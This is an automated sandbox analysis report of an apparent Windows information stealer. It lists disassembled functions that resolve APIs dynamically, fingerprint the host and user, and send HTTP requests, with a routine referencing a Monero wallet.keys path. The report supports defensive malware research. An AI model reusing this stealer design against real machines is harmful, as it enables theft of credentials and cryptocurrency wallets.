                              • Opcode Fuzzy Hash: a6d79d48f1e182226449632832d81bb28c3c240d4e747eb38dbe76990d2f1281
                              • Instruction Fuzzy Hash: B8714D71A00218ABDB24DBD4DC99BEEB779FF44700F108198F50AAB190EBB56AC5CF51
                              Function 00827690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 827690-8276da GetWindowsDirectoryA 1357 8276e3-827757 GetVolumeInformationA call 828e90 * 3 1356->1357 1358 8276dc 1356->1358 1365 827768-82776f 1357->1365 1358->1357 1366 827771-82778a call 828e90 1365->1366 1367 82778c-8277a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 8277b8-8277e8 wsprintfA call 82aa50 1367->1369 1370 8277a9-8277b6 call 82aa50 1367->1370 1377 82780e-82781e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008276D2
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082770F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827793
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0082779A
                              • wsprintfA.USER32 ref: 008277D0
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: e0b5f9e840652e232b253d4e584c45572d6c2f23b70a5d661f16c79552bc0be3
                              • Instruction ID: 27442aedebf2bff7cdf989e242917510c9b837a1b590530d792c307cd9e9b7d9
                              • Opcode Fuzzy Hash: e0b5f9e840652e232b253d4e584c45572d6c2f23b70a5d661f16c79552bc0be3
                              • Instruction Fuzzy Hash: 234171B1D04258DBDF10DB94DC85BDEBBB8FF48704F104199F609AB280D7746A84CBA5
                              Function 008279E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827A10
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827A17
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827A2F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 6edb9f3978f8e7072d83df4f780c4a3bcbcf404c8281aa8d73dff74c2f44395b
                              • Instruction ID: abb9f23ee2091dde0691b77883446eebf32702ae1fb4e09ee09e01bb88dd987d
                              • Opcode Fuzzy Hash: 6edb9f3978f8e7072d83df4f780c4a3bcbcf404c8281aa8d73dff74c2f44395b
                              • Instruction Fuzzy Hash: 25F04FB1D48249EBC700DFD9DD85BAEBBB8FB05721F10021AFA15E7680C77515408BA1
                              Function 00811160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: a8b3254add5566fadf2549a000a7bd1830d886f4e2c4dc70ca653a834acaef1b
                              • Instruction ID: 8e4dc9e3b325f736e388163eac5fbc491ae7328f4955d70b2861d99b4302f26a
                              • Opcode Fuzzy Hash: a8b3254add5566fadf2549a000a7bd1830d886f4e2c4dc70ca653a834acaef1b
                              • Instruction Fuzzy Hash: 1CD05E7490430CABCB04DFE098896DDBB78FB08215F000658D90562250EA305482CB65
                              Function 00829F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 829f20-829f2a 634 829f30-82a341 GetProcAddress * 43 633->634 635 82a346-82a3da LoadLibraryA * 8 633->635 634->635 636 82a456-82a45d 635->636 637 82a3dc-82a451 GetProcAddress * 5 635->637 638 82a463-82a521 GetProcAddress * 8 636->638 639 82a526-82a52d 636->639 637->636 638->639 640 82a5a8-82a5af 639->640 641 82a52f-82a5a3 GetProcAddress * 5 639->641 642 82a647-82a64e 640->642 643 82a5b5-82a642 GetProcAddress * 6 640->643 641->640 644 82a654-82a72a GetProcAddress * 9 642->644 645 82a72f-82a736 642->645 643->642 644->645 646 82a7b2-82a7b9 645->646 647 82a738-82a7ad GetProcAddress * 5 645->647 648 82a7bb-82a7e7 GetProcAddress * 2 646->648 649 82a7ec-82a7f3 646->649 647->646 648->649 650 82a825-82a82c 649->650 651 82a7f5-82a820 GetProcAddress * 2 649->651 652 82a922-82a929 650->652 653 82a832-82a91d GetProcAddress * 10 650->653 651->650 654 82a92b-82a988 GetProcAddress * 4 652->654 655 82a98d-82a994 652->655 653->652 654->655 656 82a996-82a9a9 GetProcAddress 655->656 657 82a9ae-82a9b5 655->657 656->657 658 82a9b7-82aa13 GetProcAddress * 4 657->658 659 82aa18-82aa19 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,015E6540), ref: 00829F3D
                              • GetProcAddress.KERNEL32(75900000,015E6500), ref: 00829F55
                              • GetProcAddress.KERNEL32(75900000,015F8F10), ref: 00829F6E
                              • GetProcAddress.KERNEL32(75900000,015F8F40), ref: 00829F86
                              • GetProcAddress.KERNEL32(75900000,015FC910), ref: 00829F9E
                              • GetProcAddress.KERNEL32(75900000,015FC898), ref: 00829FB7
                              • GetProcAddress.KERNEL32(75900000,015EB5E0), ref: 00829FCF
                              • GetProcAddress.KERNEL32(75900000,015FCAA8), ref: 00829FE7
                              • GetProcAddress.KERNEL32(75900000,015FC7F0), ref: 0082A000
                              • GetProcAddress.KERNEL32(75900000,015FCAC0), ref: 0082A018
                              • GetProcAddress.KERNEL32(75900000,015FC850), ref: 0082A030
                              • GetProcAddress.KERNEL32(75900000,015E6440), ref: 0082A049
                              • GetProcAddress.KERNEL32(75900000,015E6660), ref: 0082A061
                              • GetProcAddress.KERNEL32(75900000,015E6600), ref: 0082A079
                              • GetProcAddress.KERNEL32(75900000,015E63A0), ref: 0082A092
                              • GetProcAddress.KERNEL32(75900000,015FC928), ref: 0082A0AA
                              • GetProcAddress.KERNEL32(75900000,015FC8C8), ref: 0082A0C2
                              • GetProcAddress.KERNEL32(75900000,015EB5B8), ref: 0082A0DB
                              • GetProcAddress.KERNEL32(75900000,015E6280), ref: 0082A0F3
                              • GetProcAddress.KERNEL32(75900000,015FCA30), ref: 0082A10B
                              • GetProcAddress.KERNEL32(75900000,015FC9A0), ref: 0082A124
                              • GetProcAddress.KERNEL32(75900000,015FC9B8), ref: 0082A13C
                              • GetProcAddress.KERNEL32(75900000,015FC940), ref: 0082A154
                              • GetProcAddress.KERNEL32(75900000,015E63C0), ref: 0082A16D
                              • GetProcAddress.KERNEL32(75900000,015FC868), ref: 0082A185
                              • GetProcAddress.KERNEL32(75900000,015FC880), ref: 0082A19D
                              • GetProcAddress.KERNEL32(75900000,015FCA18), ref: 0082A1B6
                              • GetProcAddress.KERNEL32(75900000,015FC8F8), ref: 0082A1CE
                              • GetProcAddress.KERNEL32(75900000,015FC9D0), ref: 0082A1E6
                              • GetProcAddress.KERNEL32(75900000,015FC838), ref: 0082A1FF
                              • GetProcAddress.KERNEL32(75900000,015FCA78), ref: 0082A217
                              • GetProcAddress.KERNEL32(75900000,015FC808), ref: 0082A22F
                              • GetProcAddress.KERNEL32(75900000,015FC8B0), ref: 0082A248
                              • GetProcAddress.KERNEL32(75900000,015FA038), ref: 0082A260
                              • GetProcAddress.KERNEL32(75900000,015FC8E0), ref: 0082A278
                              • GetProcAddress.KERNEL32(75900000,015FC988), ref: 0082A291
                              • GetProcAddress.KERNEL32(75900000,015E62A0), ref: 0082A2A9
                              • GetProcAddress.KERNEL32(75900000,015FC970), ref: 0082A2C1
                              • GetProcAddress.KERNEL32(75900000,015E64A0), ref: 0082A2DA
                              • GetProcAddress.KERNEL32(75900000,015FC820), ref: 0082A2F2
                              • GetProcAddress.KERNEL32(75900000,015FC958), ref: 0082A30A
                              • GetProcAddress.KERNEL32(75900000,015E62C0), ref: 0082A323
                              • GetProcAddress.KERNEL32(75900000,015E6400), ref: 0082A33B
                              • LoadLibraryA.KERNEL32(015FCAD8,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A34D
                              • LoadLibraryA.KERNEL32(015FCA60,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A35E
                              • LoadLibraryA.KERNEL32(015FC9E8,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A370
                              • LoadLibraryA.KERNEL32(015FCA00,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A382
                              • LoadLibraryA.KERNEL32(015FCA48,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A393
                              • LoadLibraryA.KERNEL32(015FCA90,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A3A5
                              • LoadLibraryA.KERNEL32(015FCCD0,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A3B7
                              • LoadLibraryA.KERNEL32(015FCB50,?,00825EF3,00830AEB,?,?,?,?,?,?,?,?,?,?,00830AEA,00830AE7), ref: 0082A3C8
                              • GetProcAddress.KERNEL32(75FD0000,015E6980), ref: 0082A3EA
                              • GetProcAddress.KERNEL32(75FD0000,015FCC10), ref: 0082A402
                              • GetProcAddress.KERNEL32(75FD0000,015F8AD0), ref: 0082A41A
                              • GetProcAddress.KERNEL32(75FD0000,015FCCE8), ref: 0082A433
                              • GetProcAddress.KERNEL32(75FD0000,015E6720), ref: 0082A44B
                              • GetProcAddress.KERNEL32(734B0000,015EB090), ref: 0082A470
                              • GetProcAddress.KERNEL32(734B0000,015E6900), ref: 0082A489
                              • GetProcAddress.KERNEL32(734B0000,015EB018), ref: 0082A4A1
                              • GetProcAddress.KERNEL32(734B0000,015FCD48), ref: 0082A4B9
                              • GetProcAddress.KERNEL32(734B0000,015FCC88), ref: 0082A4D2
                              • GetProcAddress.KERNEL32(734B0000,015E67E0), ref: 0082A4EA
                              • GetProcAddress.KERNEL32(734B0000,015E69C0), ref: 0082A502
                              • GetProcAddress.KERNEL32(734B0000,015FCC58), ref: 0082A51B
                              • GetProcAddress.KERNEL32(763B0000,015E6840), ref: 0082A53C
                              • GetProcAddress.KERNEL32(763B0000,015E6940), ref: 0082A554
                              • GetProcAddress.KERNEL32(763B0000,015FCD00), ref: 0082A56D
                              • GetProcAddress.KERNEL32(763B0000,015FCDC0), ref: 0082A585
                              • GetProcAddress.KERNEL32(763B0000,015E6960), ref: 0082A59D
                              • GetProcAddress.KERNEL32(750F0000,015EAED8), ref: 0082A5C3
                              • GetProcAddress.KERNEL32(750F0000,015EB068), ref: 0082A5DB
                              • GetProcAddress.KERNEL32(750F0000,015FCCB8), ref: 0082A5F3
                              • GetProcAddress.KERNEL32(750F0000,015E69A0), ref: 0082A60C
                              • GetProcAddress.KERNEL32(750F0000,015E68C0), ref: 0082A624
                              • GetProcAddress.KERNEL32(750F0000,015EAF28), ref: 0082A63C
                              • GetProcAddress.KERNEL32(75A50000,015FCB68), ref: 0082A662
                              • GetProcAddress.KERNEL32(75A50000,015E6800), ref: 0082A67A
                              • GetProcAddress.KERNEL32(75A50000,015F8A30), ref: 0082A692
                              • GetProcAddress.KERNEL32(75A50000,015FCD60), ref: 0082A6AB
                              • GetProcAddress.KERNEL32(75A50000,015FCB80), ref: 0082A6C3
                              • GetProcAddress.KERNEL32(75A50000,015E6860), ref: 0082A6DB
                              • GetProcAddress.KERNEL32(75A50000,015E66A0), ref: 0082A6F4
                              • GetProcAddress.KERNEL32(75A50000,015FCB98), ref: 0082A70C
                              • GetProcAddress.KERNEL32(75A50000,015FCC70), ref: 0082A724
                              • GetProcAddress.KERNEL32(75070000,015E6820), ref: 0082A746
                              • GetProcAddress.KERNEL32(75070000,015FCD78), ref: 0082A75E
                              • GetProcAddress.KERNEL32(75070000,015FCBC8), ref: 0082A776
                              • GetProcAddress.KERNEL32(75070000,015FCD18), ref: 0082A78F
                              • GetProcAddress.KERNEL32(75070000,015FCDD8), ref: 0082A7A7
                              • GetProcAddress.KERNEL32(74E50000,015E6880), ref: 0082A7C8
                              • GetProcAddress.KERNEL32(74E50000,015E69E0), ref: 0082A7E1
                              • GetProcAddress.KERNEL32(75320000,015E6760), ref: 0082A802
                              • GetProcAddress.KERNEL32(75320000,015FCBE0), ref: 0082A81A
                              • GetProcAddress.KERNEL32(6F060000,015E6A00), ref: 0082A840
                              • GetProcAddress.KERNEL32(6F060000,015E68A0), ref: 0082A858
                              • GetProcAddress.KERNEL32(6F060000,015E6A20), ref: 0082A870
                              • GetProcAddress.KERNEL32(6F060000,015FCBF8), ref: 0082A889
                              • GetProcAddress.KERNEL32(6F060000,015E6680), ref: 0082A8A1
                              • GetProcAddress.KERNEL32(6F060000,015E66C0), ref: 0082A8B9
                              • GetProcAddress.KERNEL32(6F060000,015E66E0), ref: 0082A8D2
                              • GetProcAddress.KERNEL32(6F060000,015E68E0), ref: 0082A8EA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0082A901
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0082A917
                              • GetProcAddress.KERNEL32(74E00000,015FCDA8), ref: 0082A939
                              • GetProcAddress.KERNEL32(74E00000,015F8B90), ref: 0082A951
                              • GetProcAddress.KERNEL32(74E00000,015FCD30), ref: 0082A969
                              • GetProcAddress.KERNEL32(74E00000,015FCCA0), ref: 0082A982
                              • GetProcAddress.KERNEL32(74DF0000,015E6920), ref: 0082A9A3
                              • GetProcAddress.KERNEL32(6E100000,015FCD90), ref: 0082A9C4
                              • GetProcAddress.KERNEL32(6E100000,015E6780), ref: 0082A9DD
                              • GetProcAddress.KERNEL32(6E100000,015FCAF0), ref: 0082A9F5
                              • GetProcAddress.KERNEL32(6E100000,015FCC40), ref: 0082AA0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: 19881ac7e2f48a255e9bae28d5ddf4a2ce5b1d3e67395c7a7f8c48d5e21727ab
                              • Instruction ID: 3e9180b41f778089c84f44d4c20ce6a474ed0b7fa1d4601875d0239555da69e6
                              • Opcode Fuzzy Hash: 19881ac7e2f48a255e9bae28d5ddf4a2ce5b1d3e67395c7a7f8c48d5e21727ab
                              • Instruction Fuzzy Hash: 42622BB56082809FC345DFE8FCC895A7BB9F79D7417508A1ABA09CB270D735A943CB60
                              Function 008148D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 8148d0-814992 call 82aab0 call 814800 call 82aa50 * 5 InternetOpenA StrCmpCA 816 814994 801->816 817 81499b-81499f 801->817 816->817 818 8149a5-814b1d call 828cf0 call 82ac30 call 82abb0 call 82ab10 * 2 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82ac30 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82ac30 call 82abb0 call 82ab10 * 2 InternetConnectA 817->818 819 814f1b-814f43 InternetCloseHandle call 82ade0 call 81a210 817->819 818->819 905 814b23-814b27 818->905 828 814f82-814ff2 call 828b20 * 2 call 82aab0 call 82ab10 * 8 819->828 829 814f45-814f7d call 82ab30 call 82acc0 call 82abb0 call 82ab10 819->829 829->828 906 814b35 905->906 907 814b29-814b33 905->907 908 814b3f-814b72 HttpOpenRequestA 906->908 907->908 909 814b78-814e78 call 82acc0 call 82abb0 call 82ab10 call 82ac30 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82ac30 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82ac30 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82acc0 call 82abb0 call 82ab10 call 82ac30 call 82abb0 call 82ab10 call 82aa50 call 82ac30 * 2 call 82abb0 call 82ab10 * 2 call 82ade0 lstrlen call 82ade0 * 2 lstrlen call 82ade0 HttpSendRequestA 908->909 910 814f0e-814f15 InternetCloseHandle 908->910 1021 814e82-814eac InternetReadFile 909->1021 910->819 1022 814eb7-814f09 InternetCloseHandle call 82ab10 1021->1022 1023 814eae-814eb5 1021->1023 1022->910 1023->1022 1024 814eb9-814ef7 call 82acc0 call 82abb0 call 82ab10 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00814965
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 0081498A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00814B0A
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00830DDE,00000000,?,?,00000000,?,",00000000,?,015FE420), ref: 00814E38
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00814E54
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00814E68
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00814E99
                              • InternetCloseHandle.WININET(00000000), ref: 00814EFD
                              • InternetCloseHandle.WININET(00000000), ref: 00814F15
                              • HttpOpenRequestA.WININET(00000000,015FE410,?,015FDAB8,00000000,00000000,00400100,00000000), ref: 00814B65
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                              • InternetCloseHandle.WININET(00000000), ref: 00814F1F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: f8c423f0115c6c177eec3dd43dd45042e8c54e55d1e369098e78f3a44f56c6e8
                              • Instruction ID: d21de9244f4b0deeb799e03cdc162ab987d39f07387b7fb0ab97b8318686b7ab
                              • Opcode Fuzzy Hash: f8c423f0115c6c177eec3dd43dd45042e8c54e55d1e369098e78f3a44f56c6e8
                              • Instruction Fuzzy Hash: 5E12EC719101289BCB18EB94EDA2FEEB379FF54310F504599B506B6191DF702B88CF62
                              Function 00825760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
